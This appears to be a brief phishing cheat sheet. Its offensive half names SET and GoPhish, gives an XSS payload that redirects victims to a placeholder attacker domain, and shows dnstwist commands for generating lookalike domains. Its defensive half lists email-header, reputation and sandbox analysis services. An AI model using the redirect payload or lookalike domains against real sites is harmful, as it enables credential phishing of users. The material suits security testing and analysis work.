Phishing

Social Engineer Toolkit (SET):

Social Engineer Toolkit (SET)

From XSS To SET Portal: <script>window.location.replace("http://<attacker Domain>")</script>

Generate Similar Domains

dnstwist <domain> > similarDomains.txt
grep -iv "homoglyph" similarDomains.txt > Domains.txt

GoPhish

Phishing campaigns made easy:

• https://getgophish.com/

Analysis

Message Headers

• Google Email Header Analysis

• Message Header Analyzer

• MailHeader.org

IP/Web Reputation:

• ipinfo.io
• https://urlscan.io/
• https://talosintelligence.com/reputation
• URL2PNG
• Wannabrowser

URL Info:

• https://www.convertcsv.com/url-extractor.htm
• https://phishtank.com/?

Attachments (Hashes):

• https://www.virustotal.com/gui/
• https://talosintelligence.com/talos_file_reputation

Sandboxes:

• https://app.any.run/
• https://www.hybrid-analysis.com/
• https://www.joesecurity.org/
• PhishTool

MX:

• https://mxtoolbox.com/